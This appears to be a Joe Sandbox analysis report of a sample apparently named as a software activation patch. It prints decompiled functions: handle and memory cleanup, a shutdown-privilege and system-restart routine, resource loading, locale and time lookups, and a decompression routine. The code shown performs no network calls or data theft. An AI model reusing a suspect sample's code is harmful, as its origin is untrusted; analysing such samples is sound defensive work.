Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3554af80b116e35b21060cbbc6df44ef5282ed17f45008ec87b0ebbddb4e439e
Instruction ID: f6409c4485ca7bd338f5543af8cc2530bb3769743075a02b7f3240cefa60082b
Opcode Fuzzy Hash: 3554af80b116e35b21060cbbc6df44ef5282ed17f45008ec87b0ebbddb4e439e
Instruction Fuzzy Hash: 3E1181716006059BDB00EF69C981B4B7794EF84359F04847EF998AB2C6DF38DC058B6A

Uniqueness

Uniqueness Score: -1.00%

Function 004079FC Relevance: 1.3, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079FC(void* __eax, void* __edx) {
				void* _t11;
				void* _t14;

				_t11 = __edx;
				_t14 = __eax;
				if( *((char*)(__eax + 8)) != 0) {
					CloseHandle( *(__eax + 4)); // executed
				}
				E00402918(0);
				if(_t11 != 0) {
					E00402B04(_t14);
				}
				return _t14;
			}

0x004079fe
0x00407a00
0x00407a06
0x00407a0c
0x00407a0c
0x00407a15
0x00407a1c
0x00407a20
0x00407a20
0x00407a29

APIs

CloseHandle.KERNEL32(?), ref: 00407A0C

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 066f784fd68329df4130f6e67c5a0e1de43b19e02d9a5afc60124be3f7097d47
Instruction ID: 317b5c03ede138d5cd26287ffab94a369f1a3233cb4abf22224d679caf67fd96
Opcode Fuzzy Hash: 066f784fd68329df4130f6e67c5a0e1de43b19e02d9a5afc60124be3f7097d47
Instruction Fuzzy Hash: 30D05E91B00A6007E215E6BE598864A92D85F88685B08847AF644E73D1D67CAD018389

Uniqueness

Uniqueness Score: -1.00%

Function 0040836C Relevance: 1.3, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040836C(void* __eax) {
				void* _t6;
				void* _t9;

				_t9 = __eax;
				 *((intOrPtr*)(__eax + 0x64)) = 0;
				_t6 =  *(__eax + 0x60);
				if(_t6 != 0) {
					VirtualFree(_t6, 0, 0x8000); // executed
					 *((intOrPtr*)(_t9 + 0x60)) = 0;
					return 0;
				}
				return _t6;
			}

0x0040836d
0x00408371
0x00408374
0x00408379
0x00408383
0x0040838a
0x00000000
0x0040838a
0x0040838e

APIs

VirtualFree.KERNEL32(?,00000000,00008000,?,00408351), ref: 00408383

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: da78ddfa397c9e2cdf4956a2ea141b2947b48037f15e72f78cdce16bc7675b7a
Instruction ID: c3f7fe7f71c209b7548f3f70eea4568eea5cceda8148a565dbcaceff9471b988
Opcode Fuzzy Hash: da78ddfa397c9e2cdf4956a2ea141b2947b48037f15e72f78cdce16bc7675b7a
Instruction Fuzzy Hash: 9CD002B1755304AFDB90EEB94DC5B0237D87B48700F14457A6E44EB2C6E775D8108B14

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00409920 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00409920() {
				int _v4;
				struct _TOKEN_PRIVILEGES _v16;
				void* _v20;
				signed int _t6;

				if( *0x40c07c != 2) {
					L5:
					_t6 = ExitWindowsEx(2, 0);
					asm("sbb eax, eax");
					return  ~( ~_t6);
				}
				if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v20) != 0) {
					LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v16.Privileges));
					_v16.PrivilegeCount = 1;
					_v4 = 2;
					AdjustTokenPrivileges(_v20, 0,  &_v16, 0, 0, 0);
					if(GetLastError() == 0) {
						goto L5;
					}
					return 0;
				}
				return 0;
			}

0x0040992a
0x00409987
0x0040998b
0x00409992
0x00000000
0x00409994
0x0040993c
0x0040994e
0x00409953
0x0040995b
0x00409975
0x00409981
0x00000000
0x00000000
0x00000000
0x00409983
0x00000000

APIs

GetCurrentProcess.KERNEL32(00000028), ref: 0040992F
OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00409935
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 0040994E
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00409975
GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040997A
ExitWindowsEx.USER32 ref: 0040998B

Strings

SeShutdownPrivilege, xrefs: 00409947

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 107509674-3733053543
Opcode ID: 179ed9162b652ccf15c6d14b836035b236f42e51fdbed839cad4311b1fc8396b
Instruction ID: 69b49e6867c4070d7a8a5f136f8c55bc3de077f0d280c98028d7d6ae56364c3e
Opcode Fuzzy Hash: 179ed9162b652ccf15c6d14b836035b236f42e51fdbed839cad4311b1fc8396b
Instruction Fuzzy Hash: 21F062F068430275E610ABB68C07F6B61885BC0B48F50193EBA55F52C3D7BCD804866F

Uniqueness

Uniqueness Score: -1.00%

Function 0040A10C Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A10C() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceA(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E00409FC0();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E00409FC0();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E00409FC0();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E00409FC0();
				}
				return _t12;
			}

0x0040a11b
0x0040a11f
0x0040a121
0x0040a121
0x0040a131
0x0040a133
0x0040a133
0x0040a140
0x0040a144
0x0040a146
0x0040a146
0x0040a151
0x0040a155
0x0040a157
0x0040a157
0x0040a15f

APIs

FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 0040A116
SizeofResource.KERNEL32(00000000,00000000,?,0040AB8B,00000000,0040B122,?,00000001,00000000,00000002,00000000,0040B16A,?,00000000,0040B1A1), ref: 0040A129
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040AB8B,00000000,0040B122,?,00000001,00000000,00000002,00000000,0040B16A,?,00000000), ref: 0040A13B
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AB8B,00000000,0040B122,?,00000001,00000000,00000002,00000000,0040B16A), ref: 0040A14C

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 6d1e58e0e179c15565de9e5b9098d59155bd11748cd142999f7bb8aa7b6e98b6
Instruction ID: 8b92cee28785ce20b64f8d9370ff96c2b68540d1e256e0df05e6767f26cc4d74
Opcode Fuzzy Hash: 6d1e58e0e179c15565de9e5b9098d59155bd11748cd142999f7bb8aa7b6e98b6
Instruction Fuzzy Hash: 10E07EE035830265EA103AFA0DC3B2A00484B6474DF05403FB700B92C7DDBCDC1591AE

Uniqueness

Uniqueness Score: -1.00%

Function 004056E0 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004056E0(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x004056e3
0x004056e4
0x004056fa
0x00405701
0x004056fc
0x004056fc
0x004056fc
0x00405707

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004058E2,?,?,?,00000000,00405A94), ref: 004056F3

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: c7e217b6e51c096be6b931cb56113e619872b2713a6c7d1a918660c486d4d873
Instruction ID: d144edb85d9c502d4ea0939edf991ab5ce3f28f90927345f3a95d007e4e99129
Opcode Fuzzy Hash: c7e217b6e51c096be6b931cb56113e619872b2713a6c7d1a918660c486d4d873
Instruction Fuzzy Hash: DCD0A7AA31E250BAE310519B2D85EBB4BDCCBC57B4F14443FFA48D7242D2248C06A7B6

Uniqueness

Uniqueness Score: -1.00%

Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004026C4() {
				void* _v14;
				void* _v16;
				struct _SYSTEMTIME _v28;
				signed int _t13;

				GetSystemTime( &_v28);
				_t13 = ((_v28.wHour & 0x0000ffff) * 0x3c + _v28.wMinute) * 0x3c * 0x3e8;
				 *0x40d02c = _t13;
				return _t13;
			}

0x004026ce
0x004026f3
0x004026f5
0x004026fe

APIs

GetSystemTime.KERNEL32(?), ref: 004026CE

Memory Dump Source

Source File: 00000015.00000002.498473214.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.498403116.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498652593.000000000040C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000015.00000002.498755076.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: SystemTime
String ID:
API String ID: 2656138-0
Opcode ID: 9ed56ef6959dd8920af8b6d924cbc2bc4732ada3ba303b98172f22f33df6bd3d
Instruction ID: 8398a6df79db6557de4560d78939933842e781e1ed99b38cfbf2fd723ed8f470
Opcode Fuzzy Hash: 9ed56ef6959dd8920af8b6d924cbc2bc4732ada3ba303b98172f22f33df6bd3d
Instruction Fuzzy Hash: 3BE04F21E0010A42C704ABA5CD435FDF7AEAB95604F044172A418E92E0F631C252C748

Uniqueness

Uniqueness Score: -1.00%

Function 004088C0 Relevance: .5, Instructions: 545
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004088C0(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				void* _v3;
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				intOrPtr _t454;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E00408618((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E00408618(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004087C8(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004086A0((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004085B8( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E004086E4(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E004086E4(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L83:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L94:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L95;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L95;
										}
									}
									_t411 = E00408618(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E00408618(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E00408618(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L66:
										_v56 = E004087C8(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L83;
									}
									__eflags = E00408618((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L66;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E00408728(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00408754(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L94;
							}
							return 1;
						}
						_t454 = _v116;
						return _t454;
					}
					L95:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
					_v60 = 0;
					_v64 = 0;
					_t474 = 0;
					_t616 = 0;
					 *((char*)(_v68 + _v72 - 1)) = 0;
					E00408578( &_v136);
					__eflags = _v116;
					if(_v116 == 0) {
						__eflags = _v112;
						if(_v112 == 0) {
							__eflags = 0;
							_v56 = 0;
							goto L12;
						}
						return 1;
					}
					return _v116;
				} else {
					goto L6;
				}
				do {
					L6:
					 *_v108 = 0x400;
					_v84 = _v84 + 1;
					_v108 = _v108 + 2;
					__eflags = _v84 - _v80;
				} while (_v84 < _v80);
				goto L7;
			}

0x004088cc
0x004088cf
0x004088d2
0x004088dd
0x004088e0
0x004088f1
0x00408902
0x0040890a
0x00408913
0x00408919
0x0040891f
0x00408928
0x00408931
0x0040893a
0x00408943
0x0040894c
0x00408955
0x0040895e
0x00408967
0x0040896d
0x00408976
0x0040897c
0x00408985
0x00408993
0x00408999
0x0040899f
0x00000000
0x004089a1
0x004089a8
0x004089ac
0x004089b1
0x004089b4
0x004089c1
0x004089c1
0x004089c4
0x004089c8
0x00408a69
0x00408a72
0x00408aa7
0x00408aa7
0x00408aab
0x00000000
0x00000000
0x00408ab0
0x00408ab3
0x00408a79
0x00408a7b
0x00408a7e
0x00408a80
0x00408a80
0x00408a80
0x00408a8d
0x00408a8e
0x00408a94
0x00408a96
0x00408a99
0x00408a9c
0x00408a9d
0x00408aa0
0x00408aa2
0x00408aa2
0x00408aa2
0x00408aa4
0x00408aa4
0x00408aa4
0x00000000
0x00408aa4
0x00000000
0x00408ab3
0x00408ab5
0x00408ab7
0x00408acf
0x00408ab9
0x00408ac3
0x00408ac3
0x00408ad4
0x00408ad6
0x00408ad9
0x00408adc
0x00408adc
0x00408ae5
0x00408aeb
0x00408aee
0x00000000
0x00000000
0x00000000
0x00000000
0x00408af4
0x00408af4
0x00408afd
0x00408b00
0x00408b04
0x00000000
0x00000000
0x00408b0e
0x00408b12
0x00408b35
0x00408b3a
0x00408b3c
0x00408c15
0x00408c1a
0x00408c1b
0x00408d5b
0x00408d61
0x00408d64
0x00408d67
0x00408d6a
0x00408d73
0x00408d6c
0x00408d6c
0x00408d6c
0x00408d78
0x00408d90
0x00408d93
0x00408d99
0x00408d9d
0x00408da4
0x00408d9f
0x00408d9f
0x00408d9f
0x00408dc0
0x00408dc3
0x00408dc7
0x00408e40
0x00408dc9
0x00408dcf
0x00408dd2
0x00408dde
0x00408de0
0x00408de4
0x00408e1a
0x00408e3c
0x00408de6
0x00408e0a
0x00408e0a
0x00408de4
0x00408e43
0x00408e43
0x00408e44
0x00408e4f
0x00408e4f
0x00408e53
0x00408e56
0x00408e68
0x00408e6b
0x00408e78
0x00408e6d
0x00408e70
0x00408e70
0x00408e7b
0x00408e7d
0x00408e7f
0x00408e82
0x00408e84
0x00408e84
0x00408e84
0x00408e8d
0x00408e96
0x00408e99
0x00408e9a
0x00408e9d
0x00408e9f
0x00408e9f
0x00408e9f
0x00408ea1
0x00408eaa
0x00408eac
0x00408eaf
0x00408eb2
0x00408eb6
0x00000000
0x00000000
0x00408ebb
0x00408ebe
0x00000000
0x00000000
0x00000000
0x00408ebe
0x00408ec0
0x00408ec3
0x00408ec6
0x00000000
0x00000000
0x00000000
0x00408ec6
0x00000000
0x00408e46
0x00408e46
0x00000000
0x00408e46
0x00408e44
0x00408c33
0x00408c38
0x00408c3a
0x00408cea
0x00408cec
0x00408d0a
0x00408d0c
0x00408d13
0x00408d19
0x00408d0e
0x00408d0e
0x00408d0e
0x00408d1f
0x00408cee
0x00408cee
0x00408cee
0x00408d22
0x00408d25
0x00408d27
0x00408d3d
0x00408d40
0x00408d43
0x00408d4c
0x00408d45
0x00408d45
0x00408d45
0x00408d51
0x00000000
0x00408d51
0x00408c61
0x00408c63
0x00000000
0x00000000
0x00408c69
0x00408c6d
0x00408c79
0x00408c7c
0x00408c85
0x00408c7e
0x00408c7e
0x00408c7e
0x00408c8a
0x00408c8e
0x00408c90
0x00408c93
0x00408c95
0x00408c95
0x00408c95
0x00408c9e
0x00408ca7
0x00408caa
0x00408cab
0x00408cae
0x00408cb0
0x00408cb0
0x00408cb0
0x00408cb8
0x00408cba
0x00408cc0
0x00408cc3
0x00408cc9
0x00408cc9
0x00000000
0x00408cc3
0x00000000
0x00408c6f
0x00408b6c
0x00408b71
0x00408b74
0x00408bb5
0x00408b76
0x00408b7a
0x00408b80
0x00408b83
0x00408b88
0x00408b88
0x00408b88
0x00408b88
0x00408b94
0x00408ba5
0x00408ba5
0x00408bbe
0x00408bc0
0x00408bc3
0x00408bc9
0x00408bcc
0x00408bce
0x00408bce
0x00408bce
0x00408bce
0x00408bd7
0x00408bda
0x00408bdb
0x00408bde
0x00408be0
0x00408be0
0x00408be0
0x00408be2
0x00408be5
0x00408bee
0x00408bf1
0x00408bfb
0x00408bf3
0x00408bf3
0x00408bf3
0x00408be7
0x00408be7
0x00408be7
0x00000000
0x00408be5
0x00000000
0x00408b14
0x00408b06
0x00000000
0x00408b07
0x00408ecc
0x00408ed2
0x00408edb
0x00408ee1
0x00408eed
0x00408ef6
0x00408efc
0x00408f05
0x00408f0e
0x00408f17
0x00408f1d
0x00408f26
0x00408f2f
0x00408f3b
0x00408f44
0x00408f4d
0x00408f4f
0x00000000
0x00408f4f
0x004089e5
0x004089e8
0x004089f0
0x004089f6
0x004089f9
0x00408a12
0x00408a19
0x00408a1c
0x00408a1f
0x00408a22
0x00408a24
0x00408a29
0x00408a2c
0x00408a34
0x00408a36
0x00408a41
0x00408a46
0x00408a4a
0x00408a54
0x00408a58
0x00408a64
0x00408a66
0x00000000
0x00408a66
0x00000000
0x00408a5a
0x00000000
0x00000000
0x00000000
0x00000000
0x004089fb
0x004089fb
0x004089fe
0x00408a03
0x00408a06
0x00408a0d
0x00408a0d
0x00000000

Memory Dump Source

